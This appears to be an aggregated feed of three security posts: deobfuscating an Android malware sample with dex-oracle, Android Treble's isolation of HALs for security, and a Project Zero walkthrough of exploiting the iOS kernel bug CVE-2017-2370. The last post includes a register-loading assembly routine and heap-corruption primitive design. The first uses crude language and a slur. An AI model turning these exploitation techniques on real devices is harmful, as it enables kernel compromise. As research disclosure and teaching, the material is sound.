Hacking with dex-oracle for Android Malware Deobfuscation

About a month or two ago, someone asked me to analyze some obfuscated Android malware. Recently, I finally had a chance to take a look. I ended up using dex-oracle along with some tricks to partially deobfuscate it. In this post, I’m going to explain the tricks and the overall process I used. This post will be useful if you deal with a lot of obfuscated Android apps.

The main problem was dex-oracle didn’t work “out of the box”. It took some “hacking” to make it work. Specifically, I modified an existing deobfuscation plugin to create two new plugins as well as slightly modify the app. It’s really hard to make completely generalized deobfuscation tools, or any kind of advanced tool, so you’ll need to know how it works in order to modify it to suit your needs.

The Sample

Here’s the SHA256:

1

2

$ shasum -a 256 xjmurla.gqscntaej.bfdiays.apk

d3becbee846560d0ffa4f3cda708d69a98dff92785b7412d763f810c51c0b091 xjmurla.gqscntaej.bfdiays.apk

High-Level Analysis

I like to start with a decompilation just to get a high level overview of the package structure. Here’s what the class list:

class list

Some class names have been ProGuard’ed (a, b, c, etc.) but some haven’t (Ceacbcbf). These unobfuscated classes are probably Android components (activity, service, broadcast receiver, etc.) which must be declared in the manifest. Thus, any tool which automatically renames them would also have to rename them in the manifest, which is hard. These may have been manually changed. The obfuscation is probably home-made and partially done by hand. This means it’s probably malicious because a legit developer would probably pull a commercial obfuscator off the shelf and just use that. They wouldn’t waste time changing their class names to something indecipherable like Aeabffdccdac.

The code is obfuscated. Below is a class which shows the obfuscation:

obfuscated method decompilation

You can’t see any strings or class names, which is really annoying. This looks like something Simplify can handle, but, spoilers, it fails miserably. That’s fine. I have many tricks up my sleeve. Let’s take a look at the Smali and see if anything jumps out.

String and Class Obfuscation

The first type of obfuscation which jumped out at me was an “indexed string lookup” type obfuscation.

1

2

3

const v2, 0x320fb26f

invoke-static {v2}, Lxjmurla/gqscntaej/bfdiays/f;->a(I)Ljava/lang/String;

move-result-object v2

This pattern is found hundreds of times in the code. It takes a number, passes it to f.a(int), and gets a string back. This is some basic “level 1” style encryption. There’s probably a big method somewhere which builds an array of strings that the number indexes into.

A second type of obfuscation hides class constants using an identical technique:

1

2

3

const v1, 0x19189b07

invoke-static {v1}, Lxjmurla/gqscntaej/bfdiays/g;->c(I)Ljava/lang/Class;

move-result-object v1

This code passes a number to g.c(int) and gets back a class object (const-class).

You may be thinking you’ll have to reverse engineer the lookup methods, and you’d be wrong. It’s cool and all to deep dive into the complex code and completely master it by writing a decryption routine. But honestly, fuck that. Speed is the name of the game, and I really don’t have time to fuck around with this malware author’s bullshit, retarded, home-made, amateur hour obfuscation. Instead of reversing everything, consider that these “lookup” methods are both static. It should be possible to just execute them with the same inputs from the code to get back the decrypted output. For example, in the case of string decryption, I should be able to execute f.a(0x320fb26f) and get back the decrypted string.

The question is, of course, how do you execute just the target method code? It’s an APK. How can you execute just the method you want with the inputs you want? How do you harness the target methods? There are two paths you can go by:

  1. Convert target DEX to a JAR using dex2jar or enjarify. Then, import the JAR into a Java app and call the decryption code from your Java app.
  2. Create a stub / driver app which takes command line arguments and can reflect methods in a DEX file. Then, execute the driver app + target DEX on an emulator.

As it happens, I’ve already created dex-oracle which does #2. I like #2 more than #1 because it doesn’t rely on decompilers which often introduce subtle logic bugs. However, I’ve used #1 a few times in a pinch, so it’s worth mentioning. I went about adding support for this type of obfuscation to dex-oracle. the plugins were added in Add indexed string + class lookups.

The way dex-oracle works is pretty simple. It contains a collection of plugins which define regular expressions which pull out key bits of information – method calls and arguments. Then, it constructs real method calls with the arguments you pull out and passes them to a driver which executes the original DEX file on an emulator. Finally, the plugin defines how the driver output should be used to modify the method.

For example, the regular expression could look for “a const number, a call to a static method which takes a number and returns a string, and moves the result to a register”. Then, the driver executes that method with the number and returns the decrypt string. Finally, the original string lookup code is replaced with just the decrypted string. You can read more about how it works in TetCon 2016 Android Deobfuscation Presentation.

dex-oracle Before Modification

Unfortunately, even with the new plugins, dex-oracle fails. To keep things simple, I disable all plugins except IndexStringLookup and I only process the d class from the picture example above.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

$ dex-oracle xjmurla.gqscntaej.bfdiays.apk --disable-plugins bitwiseantiskid,stringdecryptor,undexguard,unreflector,indexedclasslookup -i '/d'

Invalid date/time in zip entry

Invalid date/time in zip entry

Invalid date/time in zip entry

Invalid date/time in zip entry

Invalid date/time in zip entry

Invalid date/time in zip entry

Invalid date/time in zip entry

Invalid date/time in zip entry

Invalid date/time in zip entry

Optimizing 11 methods over 23 Smali files.

[WARN] 2017-10-28 12:28:45: Unsuccessful status: failure for Error executing 'static java.lang.String xjmurla.gqscntaej.bfdiays.f.a(int)' with 'I:839889519'

java.lang.reflect.InvocationTargetException

at java.lang.reflect.Method.invokeNative(Native Method)

at java.lang.reflect.Method.invoke(Method.java:515)

at org.cf.oracle.Driver.invokeMethod(Driver.java:71)

at org.cf.oracle.Driver.main(Driver.java:131)

at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)

at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:243)

at dalvik.system.NativeStart.main(Native Method)

Caused by: java.lang.NullPointerException

at xjmurla.gqscntaej.bfdiays.f.a(SourceFile:528)

... 7 more

// ** SNIP MANY SIMILAR ERRORS **

Optimizations: string_lookups=13

Invalid date/time in zip entry

// ** SNIP DUMB WARNINGS **

Invalid date/time in zip entry

Time elapsed 1.954255 seconds

The Invalid date/time in zip entry stuff is just noise. Maybe they tried obfuscating the timestamp in the ZIP? I dunno.

What concerns me is the Unsuccessful status: failure for Error executing 'static java.lang.String xjmurla.gqscntaej.bfdiays.f.a(int)' with 'I:839889519'. The error tells me there’s a NullPointerException when it executes f.a(int). Looks like every time it tried to call that method, it failed. So, let’s look at f.a(int).

1

2

3

4

5

6

7

8

9

10

11

.method static a(I)Ljava/lang/String;

.registers 3

sget-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;

const v1, 0x320fb1f0

sub-int v1, p0, v1

aget-object v0, v0, v1

return-object v0

.end method

The entire method is pretty small. Just subtracts the first argument from a big constant and uses that as an index into a string array, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;. Well, let’s look out f;->k is initialized.

1

2

3

4

5

6

7

8

$ ag -Q 'Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;'

xjmurla/gqscntaej/bfdiays/Ceacabcbf.smali

169: sput-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;

245: sget-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;

256: sget-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;

xjmurla/gqscntaej/bfdiays/f.smali

72: sget-object v0, Lxjmurla/gqscntaej/bfdiays/f;->k:[Ljava/lang/String;

There’s only one sput-object and it’s in xjmurla/gqscntaej/bfdiays/Ceacabcbf.smali. By looking for this line in Ceacabcbf, we find private Ceacabcbf;->a()V. This is a big, long, complicated method which contains a HUGE string literal which is processed, chunked up, and stored in f;->k. Hmm, our NullPointerException is caused by this field not getting initialized. This means that Ceacabcbf;->a()V is not getting called during execution of the string decryption method. Well, when is it called?

1

2

3

$ ag -Q 'Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->a()V'

xjmurla/gqscntaej/bfdiays/Ceacabcbf.smali

1313: invoke-direct {p0}, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->a()V

Ahh, it’s only called in Ceacabcbf. Let’s find that.

1

2

3

4

5

6

7

8

9

10

11

.method public onCreate()V

.registers 1

invoke-super {p0}, Landroid/app/Application;->onCreate()V

sput-object p0, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->a:Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;

invoke-direct {p0}, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->a()V

return-void

.end method

It’s called in Ceacabcbf;->onCreate()V. This class is a subclass of Application. Without looking at the manifest, I’m pretty sure that when the app starts, this component is created, onCreate()V is called, the decrypted string array is built, and most importantly f;->k is initialized. Hmm, how can I make it so that dex-oracle calls this method when decrypting strings?

My first thought is to add a method call to Ceacabcbf;->a()V in f;-><clinit>. This ensures that when the string decryption class f is loaded, it initializes the decrypted string array. BUT, a()V is direct. WHAT TO DO?

Well, this is kind of dumb but it works sometimes. Just create a new public, static method called Ceacabcbf;->init_decrypt()V and copy the code from Ceacabcbf;->a()V. Then, add a line to call this method in f;-><clinit>:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

.method static constructor <clinit>()V

.registers 1

const/4 v0, 0x0

sput v0, Lxjmurla/gqscntaej/bfdiays/f;->a:I

sput v0, Lxjmurla/gqscntaej/bfdiays/f;->d:I

sput v0, Lxjmurla/gqscntaej/bfdiays/f;->e:I

sput v0, Lxjmurla/gqscntaej/bfdiays/f;->f:I

const/4 v0, 0x4

new-array v0, v0, [Ljava/lang/String;

sput-object v0, Lxjmurla/gqscntaej/bfdiays/f;->h:[Ljava/lang/String;

const-string v0, ""

sput-object v0, Lxjmurla/gqscntaej/bfdiays/f;->i:Ljava/lang/Object;

# LOL MONEY, MONEY LOL

invoke-static {}, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->init_decrypt()V

return-void

.end method

dex-oracle After Modification

After making some changes which hopefully work, need rebuild the DEX from the modified Smali and try dex-oracle on it.

1

2

3

4

5

$ smali ass out -o xjmurla_mod1.dex

$ dex-oracle xjmurla_mod1.dex --disable-plugins bitwiseantiskid,stringdecryptor,undexguard,unreflector,indexedclasslookup -i '/d'

Optimizing 11 methods over 23 Smali files.

Optimizations: string_lookups=13

Time elapsed 2.034493 seconds

No errors. Let’s see the decompilation.

1

2

3

$ d2j-dex2jar.sh xjmurla_mod1_oracle.dex

dex2jar xjmurla_mod1_oracle.dex -> ./xjmurla_mod1_oracle-dex2jar.jar

$ jd xjmurla_mod1_oracle-dex2jar.jar

deobfuscated strings

Oh, hello there Mr. C&C domain! GET REKT BRO.

get rekt

Ok, but that still leaves the class deobfuscation. That’s still annoying, right? Well, to keep this post short, dex-oracle fails when deobbfuscating classes for the same reason as it originally failed for strings. The same Ceacabcbf;->a()V method needs to be called.

The same trick can be used – just call Ceacabcbf;->init_decrypt()V in g;-><clinit>. However, g doesn’t have a <clinit> so you’ll have to add one:

1

2

3

4

5

6

.method static constructor <clinit>()V

.registers 0

invoke-static {}, Lxjmurla/gqscntaej/bfdiays/Ceacabcbf;->init_decrypt()V

return-void

.end method

Now, rebuild and let dex-oracle do it’s thing:

1

2

3

4

5

$ smali ass out -o xjmurla_mod2.dex

$ dex-oracle xjmurla_mod2.dex -i '/d'

Optimizing 11 methods over 23 Smali files.

Optimizations: string_decrypts=0, class_lookups=13, string_lookups=13

Time elapsed 3.099335 seconds

Let’s see if the decompilation looks any different.

1

2

3

$ d2j-dex2jar.sh xjmurla_mod2_oracle.dex

dex2jar xjmurla_mod1_oracle.dex -> ./xjmurla_mod2_oracle-dex2jar.jar

$ jd xjmurla_mod1_oracle-dex2jar.jar

deobfuscated strings and classes

There’s not much difference for this method, but other methods have a lot more information, especially in the Smali where you can see lots of const-classes. There’s still one call to g.c(int) which isn’t deobfuscated. I found out that this is because the method call succeeds but returns null. Maybe that’s why it’s in a try-catch? Maybe it’s trying to load a class which doesn’t exist on every Android API version?

One final test: run it against the entire DEX file.

1

2

3

4

$ dex-oracle xjmurla_mod2.dex

Optimizing 125 methods over 23 Smali files.

Optimizations: string_decrypts=0, class_lookups=354, string_lookups=330

Time elapsed 3.306326 seconds

It worked. Cool. Now there are lots of strings! This should also make it a lot easier for Simplify to work because there’s less code to execute and fewer places to fail.

Summary

Hopefully after reading this you have better idea of how to bend dex-oracle to suit your needs. It’s pretty flexible and great when you can isolate the code you need to run to a single method. Sometimes you need to make changes to an Android app to help dex-oracle, but modifying Smali is relatively easy to modify and a lot of malware doesn’t bother doing anti-tampering checks.

from RedNaga Security http://ift.tt/2gLMz5s

Advertisements

Shut the HAL Up

Posted by Jeff Vander Stoep, Senior Software Engineer, Android Security

Updates are essential for security, but they can be difficult and expensive for
device manufacturers. Project
Treble
is making updates easier by separating the underlying vendor
implementation from the core Android framework. This modularization allows
platform and vendor-provided components to be updated independently of each
other. While easier and faster updates are awesome, Treble’s increased
modularity is also designed to improve security.

Isolating HALs

A Hardware
Abstraction Layer
(HAL) provides an interface between device-agnostic code
and device-specific hardware implementations. HALs are commonly packaged as
shared libraries loaded directly into the process that requires hardware
interaction. Security boundaries are enforced at the process level. Therefore,
loading the HAL into a process means that the HAL is running in the same
security context as the process it’s loaded into.

The traditional method of running HALs in-process means that the process needs
all the permissions required by each in-process HAL, including direct access to
kernel drivers. Likewise, all HALs in a process have access to the same set of
permissions as the rest of the process, including permissions required by other
in-process HALs. This results in over-privileged processes and HALs that have
access to permissions and hardware that they shouldn’t.

Figure 1. Traditional method of multiple HALs in one process.

Moving HALs into their own processes better adheres to the principle of
least privilege
. This provides two distinct advantages:

  1. Each HAL runs in its own sandbox and is permitted access to only the
    hardware driver it controls and the permissions granted to the process are
    limited to the permissions required to do its job.

  2. Similarly, the process loses access to hardware drivers and other
    permissions and capabilities needed by the HALs.
Figure 2. Each HAL runs in its own process.

Moving HALs into their own processes is great for security, but it comes at the
cost of increased IPC overhead between the client process and the HAL. Improvements to the binder
driver
made IPC between HALs and clients practical. Introducing
scatter-gather into binder improves the performance of each transaction by
removing the need for the serialization/deserialization steps and reducing the
number of copy operations performed on data from three down to one. Android O
also introduces binder domains to provide separate communication streams for
vendor and platform components. Apps and the Android frameworks continue to use
/dev/binder, but vendor-provided components now use /dev/vndbinder.
Communication between the platform and vendor components must use /dev/hwbinder.
Other means of IPC between platform and vendor are disallowed.

Case study: System Server

Many of the services offered to apps by the core Android OS are provided by the
system server. As Android has grown, so has system server’s responsibilities and
permissions, making it an attractive target for an attacker.
As part of project Treble, approximately 20 HALs were moved out of system
server, including the HALs for sensors, GPS, fingerprint, Wi-Fi, and more.
Previously, a compromise in any of those HALs would gain privileged system
permissions, but in Android O, permissions are restricted to the subset needed
by the specific HAL.

Case study: media frameworks

Efforts to harden
the media stack
in Android Nougat continued in Android O. In Nougat,
mediaserver was split into multiple components to better adhere to the principle
of least privilege, with audio hardware access restricted to audioserver, camera
hardware access restricted to cameraserver, and so on. In Android O, most direct
hardware access has been entirely removed from the media frameworks. For example
HALs for audio, camera, and DRM have been moved out of audioserver,
cameraserver, and drmserver respectively.

Reducing and isolating the attack surface of the kernel

The Linux kernel is the primary enforcer of the security model on Android.
Attempts to escape sandboxing mechanisms often involve attacking the kernel. An
analysis
of kernel vulnerabilities on Android showed that they overwhelmingly occurred in
and were reached through hardware drivers.

De-privileging system server and the media frameworks is important because they
interact directly with installed apps. Removing direct access to hardware
drivers makes bugs difficult to reach and adds another layer of defense to
Android’s security model.

from Android Developers Blog http://ift.tt/2veReTw

Exception-oriented exploitation on iOS

Posted by Ian Beer, Project Zero

This post covers the discovery and exploitation of CVE-2017-2370, a heap buffer overflow in the mach_voucher_extract_attr_recipe_trap mach trap. It covers the bug, the development of an exploitation technique which involves repeatedly and deliberately crashing and how to build live kernel introspection features using old kernel exploits.

It’s a trap!
Alongside a large number of BSD syscalls (like ioctl, mmap, execve and so on) XNU also has a small number of extra syscalls supporting the MACH side of the kernel called mach traps. Mach trap syscall numbers start at 0x1000000. Here’s a snippet from the syscall_sw.c file where the trap table is defined:

/* 12 */ MACH_TRAP(_kernelrpc_mach_vm_deallocate_trap, 3, 5, munge_wll),
/* 13 */ MACH_TRAP(kern_invalid, 0, 0, NULL),
/* 14 */ MACH_TRAP(_kernelrpc_mach_vm_protect_trap, 5, 7, munge_wllww),

Most of the mach traps are fast-paths for kernel APIs that are also exposed via the standard MACH MIG kernel apis. For example mach_vm_allocate is also a MIG RPC which can be called on a task port.

Mach traps provide a faster interface to these kernel functions by avoiding the serialization and deserialization overheads involved in calling kernel MIG APIs. But without that autogenerated code complex mach traps often have to do lots of manual argument parsing which is tricky to get right.

In iOS 10 a new entry appeared in the mach_traps table:

/* 72 */ MACH_TRAP(mach_voucher_extract_attr_recipe_trap, 4, 4, munge_wwww),

The mach trap entry code will pack the arguments passed to that trap by userspace into this structure:

 struct mach_voucher_extract_attr_recipe_args {
   PAD_ARG_(mach_port_name_t, voucher_name);
   PAD_ARG_(mach_voucher_attr_key_t, key);
   PAD_ARG_(mach_voucher_attr_raw_recipe_t, recipe);
   PAD_ARG_(user_addr_t, recipe_size);
 };

A pointer to that structure will then be passed to the trap implementation as the first argument. It’s worth noting at this point that adding a new syscall like this means it can be called from every sandboxed process on the system. Up until you reach a mandatory access control hook (and there are none here) the sandbox provides no protection.

Let’s walk through the trap code:

kern_return_t
mach_voucher_extract_attr_recipe_trap(
 struct mach_voucher_extract_attr_recipe_args *args)
{
 ipc_voucher_t voucher = IV_NULL;
 kern_return_t kr = KERN_SUCCESS;
 mach_msg_type_number_t sz = 0;

 if (copyin(args->recipe_size, (void *)&sz, sizeof(sz)))
   return KERN_MEMORY_ERROR;

copyin has similar semantics to copy_from_user on Linux. This copies 4 bytes from the userspace pointer args->recipe_size to the sz variable on the kernel stack, ensuring that the whole source range really is in userspace and returning an error code if the source range either wasn’t completely mapped or pointed to kernel memory. The attacker now controls sz.

 if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE)
   return MIG_ARRAY_TOO_LARGE;

mach_msg_type_number_t is a 32-bit unsigned type so sz has to be less than or equal to MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120) to continue.

 voucher = convert_port_name_to_voucher(args->voucher_name);
 if (voucher == IV_NULL)
   return MACH_SEND_INVALID_DEST;

convert_port_name_to_voucher looks up the args->voucher_name mach port name in the calling task’s mach port namespace and checks whether it names an ipc_voucher object, returning a reference to the voucher if it does. So we need to provide a valid voucher port as voucher_name to continue past here.

 if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) {
   /* keep small recipes on the stack for speed */
   uint8_t krecipe[sz];
   if (copyin(args->recipe, (void *)krecipe, sz)) {
     kr = KERN_MEMORY_ERROR;
       goto done;
   }
   kr = mach_voucher_extract_attr_recipe(voucher,
            args->key, (mach_voucher_attr_raw_recipe_t)krecipe, &sz);

   if (kr == KERN_SUCCESS && sz > 0)
     kr = copyout(krecipe, (void *)args->recipe, sz);
 }

If sz was less than MACH_VOUCHER_TRAP_STACK_LIMIT (256) then this allocates a small variable-length-array on the kernel stack and copies in sz bytes from the userspace pointer in args->recipe to that VLA. The code then calls the target mach_voucher_extract_attr_recipe method before calling copyout (which takes its kernel and userspace arguments the other way round to copyin) to copy the results back to userspace. All looks okay, so let’s take a look at what happens if sz was too big to let the recipe be “kept on the stack for speed”:

 else {
   uint8_t *krecipe = kalloc((vm_size_t)sz);
   if (!krecipe) {
     kr = KERN_RESOURCE_SHORTAGE;
     goto done;
   }

   if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
     kfree(krecipe, (vm_size_t)sz);
     kr = KERN_MEMORY_ERROR;
     goto done;
   }

The code continues on but let’s stop here and look really carefully at that snippet. It calls kalloc to make an sz-byte sized allocation on the kernel heap and assigns the address of that allocation to krecipe. It then calls copyin to copy args->recipe_size bytes from the args->recipe userspace pointer to the krecipe kernel heap buffer.

If you didn’t spot the bug yet, go back up to the start of the code snippets and read through them again. This is a case of a bug that’s so completely wrong that at first glance it actually looks correct!

To explain the bug it’s worth donning our detective hat and trying to work out what happened to cause such code to be written. This is just conjecture but I think it’s quite plausible.

a recipe for copypasta
Right above the mach_voucher_extract_attr_recipe_trap method in mach_kernelrpc.c there’s the code for host_create_mach_voucher_trap, another mach trap.

These two functions look very similar. They both have a branch for a small and large input size, with the same /* keep small recipes on the stack for speed */ comment in the small path and they both make a kernel heap allocation in the large path.

It’s pretty clear that the code for mach_voucher_extract_attr_recipe_trap has been copy-pasted from host_create_mach_voucher_trap then updated to reflect the subtle difference in their prototypes. That difference is that the size argument to host_create_mach_voucher_trap is an integer but the size argument to mach_voucher_extract_attr_recipe_trap is a pointer to an integer.

This means that mach_voucher_extract_attr_recipe_trap requires an extra level of indirection; it first needs to copyin the size before it can use it. Even more confusingly the size argument in the original function was called recipes_size and in the newer function it’s called recipe_size (one fewer ‘s’.)

Here’s the relevant code from the two functions, the first snippet is fine and the second has the bug:

host_create_mach_voucher_trap:

if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
 kfree(krecipes, (vm_size_t)args->recipes_size);
 kr = KERN_MEMORY_ERROR;
 goto done;
}

mach_voucher_extract_attr_recipe_trap:

 if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) {
   kfree(krecipe, (vm_size_t)sz);
   kr = KERN_MEMORY_ERROR;
   goto done;
 }

My guess is that the developer copy-pasted the code for the entire function then tried to add the extra level of indirection but forgot to change the third argument to the copyin call shown above. They built XNU and looked at the compiler error messages. XNU builds with clang, which gives you fancy error messages like this:

error: no member named ‘recipes_size’ in ‘struct mach_voucher_extract_attr_recipe_args’; did you mean ‘recipe_size’?
if (copyin(args->recipes, (void *)krecipes, args->recipes_size)) {
                                                 ^~~~~~~~~~~~
                                                 recipe_size

Clang assumes that the developer has made a typo and typed an extra ‘s’. Clang doesn’t realize that its suggestion is semantically totally wrong and will introduce a critical memory corruption issue. I think that the developer took clang’s suggestion, removed the ‘s’, rebuilt and the code compiled without errors.

Building primitives
copyin on iOS will fail if the size argument is greater than 0x4000000. Since recipes_size also needs to be a valid userspace pointer this means we have to be able to map an address that low. From a 64-bit iOS app we can do this by giving the pagezero_size linker option a small value. We can completely control the size of the copy by ensuring that our data is aligned right up to the end of a page and then unmapping the page after it. copyin will fault when the copy reaches unmapped source page and stop.

If the copyin fails the kalloced buffer will be immediately freed.

Putting all the bits together we can make a kalloc heap allocation of between 256 and 5120 bytes and overflow out of it as much as we want with completely controlled data.

When I’m working on a new exploit I spend a lot of time looking for new primitives; for example objects  allocated on the heap which if I could overflow into it I could cause a chain of interesting things to happen. Generally interesting means if I corrupt it I can use it to build a better primitive. Usually my end goal is to chain these primitives to get an arbitrary, repeatable and reliable memory read/write.

To this end one style of object I’m always on the lookout for is something that contains a length or size field which can be corrupted without having to fully corrupt any pointers. This is usually an interesting target and warrants further investigation.

For anyone who has ever written a browser exploit this will be a familiar construct!

ipc_kmsg
Reading through the XNU code for interesting looking primitives I came across struct ipc_kmsg:

struct ipc_kmsg {
 mach_msg_size_t            ikm_size;
 struct ipc_kmsg            *ikm_next;
 struct ipc_kmsg            *ikm_prev;
 mach_msg_header_t          *ikm_header;
 ipc_port_t                 ikm_prealloc;
 ipc_port_t                 ikm_voucher;
 mach_msg_priority_t        ikm_qos;
 mach_msg_priority_t        ikm_qos_override
 struct ipc_importance_elem *ikm_importance;
 queue_chain_t              ikm_inheritance;
};

This is a structure which has a size field that can be corrupted without needing to know any pointer values. How is the ikm_size field used?

Looking for cross references to ikm_size in the code we can see it’s only used in a handful of places:

void ipc_kmsg_free(ipc_kmsg_t kmsg);

This function uses kmsg->ikm_size to free the kmsg back to the correct kalloc zone. The zone allocator will detect frees to the wrong zone and panic so we’ll have to be careful that we don’t free a corrupted ipc_kmsg without first fixing up the size.

This macro is used to set the ikm_size field:

#define ikm_init(kmsg, size)  \
MACRO_BEGIN                   \
(kmsg)->ikm_size = (size);   \

This macro uses the ikm_size field to set the ikm_header pointer:

#define ikm_set_header(kmsg, mtsize)                       \
MACRO_BEGIN                                                \
(kmsg)->ikm_header = (mach_msg_header_t *)                 \
((vm_offset_t)((kmsg) + 1) + (kmsg)->ikm_size – (mtsize)); \
MACRO_END

That macro is using the ikm_size field to set the ikm_header field such that the message is aligned to the end of the buffer; this could be interesting.

Finally there’s a check in ipc_kmsg_get_from_kernel:

 if (msg_and_trailer_size > kmsg->ikm_size – max_desc) {
   ip_unlock(dest_port);
   return MACH_SEND_TOO_LARGE;
 }

That’s using the ikm_size field to ensure that there’s enough space in the ikm_kmsg buffer for a message.

It looks like if we corrupt the ikm_size field we’ll be able to make the kernel believe that a message buffer is bigger than it really is which will almost certainly lead to message contents being written out of bounds. But haven’t we just turned a kernel heap overflow into… another kernel heap overflow? The difference this time is that a corrupted ipc_kmsg might also let me read memory out of bounds. This is why corrupting the ikm_size field could be an interesting thing to investigate.

It’s about sending a message
ikm_kmsg structures are used to hold in-transit mach messages. When userspace sends a mach message we end up in ipc_kmsg_alloc. If the message is small (less than IKM_SAVED_MSG_SIZE) then the code will first look in a cpu-local cache for recently freed ikm_kmsg structures. If none are found it will allocate a new cacheable message from the dedicated ipc.kmsg zalloc zone.

Larger messages bypass this cache are are directly allocated by kalloc, the general purpose kernel heap allocator. After allocating the buffer the structure is immediately initialized using the two macros we saw:

 kmsg = (ipc_kmsg_t)kalloc(ikm_plus_overhead(max_expanded_size));
…  
 if (kmsg != IKM_NULL) {
   ikm_init(kmsg, max_expanded_size);
   ikm_set_header(kmsg, msg_and_trailer_size);
 }

 return(kmsg);

Unless we’re able to corrupt the ikm_size field in between those two macros the most we’d be able to do is cause the message to be freed to the wrong zone and immediately panic. Not so useful.

But ikm_set_header is called in one other place: ipc_kmsg_get_from_kernel.

This function is only used when the kernel sends a real mach message; it’s not used for sending replies to kernel MIG apis for example. The function’s comment explains more:

* Routine: ipc_kmsg_get_from_kernel
* Purpose:
* First checks for a preallocated message
* reserved for kernel clients.  If not found –
* allocates a new kernel message buffer.
* Copies a kernel message to the message buffer.

Using the mach_port_allocate_full method from userspace we can allocate a new mach port which has a single preallocated ikm_kmsg buffer of a controlled size. The intended use-case is to allow userspace to receive critical messages without the kernel having to make a heap allocation. Each time the kernel sends a real mach message it first checks whether the port has one of these preallocated buffers and it’s not currently in-use. We then reach the following code (I’ve removed the locking and 32-bit only code for brevity):

 if (IP_VALID(dest_port) && IP_PREALLOC(dest_port)) {
   mach_msg_size_t max_desc = 0;
   
   kmsg = dest_port->ip_premsg;
   if (ikm_prealloc_inuse(kmsg)) {
     ip_unlock(dest_port);
     return MACH_SEND_NO_BUFFER;
   }

   if (msg_and_trailer_size > kmsg->ikm_size – max_desc) {
     ip_unlock(dest_port);
     return MACH_SEND_TOO_LARGE;
   }
   ikm_prealloc_set_inuse(kmsg, dest_port);
   ikm_set_header(kmsg, msg_and_trailer_size);
   ip_unlock(dest_port);
…  
 (void) memcpy((void *) kmsg->ikm_header, (const void *) msg, size);

This code checks whether the message would fit (trusting kmsg->ikm_size), marks the preallocated buffer as in-use, calls the ikm_set_header macro to which sets ikm_header such that the message will align to the end the of the buffer and finally calls memcpy to copy the message into the ipc_kmsg.

This means that if we can corrupt the ikm_size field of a preallocated ipc_kmsg and make it appear larger than it is then when the kernel sends a message it will write the message contents off the end of the preallocate message buffer.

ikm_header is also used in the mach message receive path, so when we dequeue the message it will also read out of bounds. If we could replace whatever was originally after the message buffer with data we want to read we could then read it back as part of the contents of the message.

This new primitive we’re building is more powerful in another way: if we get this right we’ll be able to read and write out of bounds in a repeatable, controlled way without having to trigger a bug each time.

Exceptional behaviour
There’s one difficulty with preallocated messages: because they’re only used when the kernel send a message to us we can’t just send a message with controlled data and get it to use the preallocated ipc_kmsg. Instead we need to persuade the kernel to send us a message with data we control, this is much harder!

There are only and handful of places where the kernel actually sends userspace a mach message. There are various types of notification messages like IODataQueue data-available notifications, IOServiceUserNotifications and no-senders notifications. These usually only contains a small amount of user-controlled data. The only message types sent by the kernel which seem to contain a decent amount of user-controlled data are exception messages.

When a thread faults (for example by accessing unallocated memory or calling a software breakpoint instruction) the kernel will send an exception message to the thread’s registered exception handler port.

If a thread doesn’t have an exception handler port the kernel will try to send the message to the task’s exception handler port and if that also fails the exception message will be delivered to to global host exception port. A thread can normally set its own exception port but setting the host exception port is a privileged action.

routine thread_set_exception_ports(
        thread         : thread_act_t;
        exception_mask : exception_mask_t;
        new_port       : mach_port_t;
        behavior       : exception_behavior_t;
        new_flavor     : thread_state_flavor_t);

This is the MIG definition for thread_set_exception_ports. new_port should be a send right to the new exception port. exception_mask lets us restrict the types of exceptions we want to handle. behaviour defines what type of exception message we want to receive and new_flavor lets us specify what kind of process state we want to be included in the message.

Passing an exception_mask of EXC_MASK_ALL, EXCEPTION_STATE for behavior and ARM_THREAD_STATE64 for new_flavor means that the kernel will send an exception_raise_state message to the exception port we specify whenever the specified thread faults. That message will contain the state of all the ARM64 general purposes registers, and that’s what we’ll use to get controlled data written off the end of the ipc_kmsg buffer!

Some assembly required…
In our iOS XCode project we can added a new assembly file and define a function load_regs_and_crash:

.text
.globl  _load_regs_and_crash
.align  2
_load_regs_and_crash:
mov x30, x0
ldp x0, x1, [x30, 0]
ldp x2, x3, [x30, 0x10]
ldp x4, x5, [x30, 0x20]
ldp x6, x7, [x30, 0x30]
ldp x8, x9, [x30, 0x40]
ldp x10, x11, [x30, 0x50]
ldp x12, x13, [x30, 0x60]
ldp x14, x15, [x30, 0x70]
ldp x16, x17, [x30, 0x80]
ldp x18, x19, [x30, 0x90]
ldp x20, x21, [x30, 0xa0]
ldp x22, x23, [x30, 0xb0]
ldp x24, x25, [x30, 0xc0]
ldp x26, x27, [x30, 0xd0]
ldp x28, x29, [x30, 0xe0]
brk 0
.align  3

This function takes a pointer to a 240 byte buffer as the first argument then assigns each of the first 30 ARM64 general-purposes registers values from that buffer such that when it triggers a software interrupt via brk 0 and the kernel sends an exception message that message contains the bytes from the input buffer in the same order.

We’ve now got a way to get controlled data in a message which will be sent to a preallocated port, but what value should we overwrite the ikm_size with to get the controlled portion of the message to overlap with the start of the following heap object? It’s possible to determine this statically, but it would be much easier if we could just use a kernel debugger and take a look at what happens. However iOS only runs on very locked-down hardware with no supported way to do kernel debugging.

I’m going to build my own kernel debugger (with printfs and hexdumps)
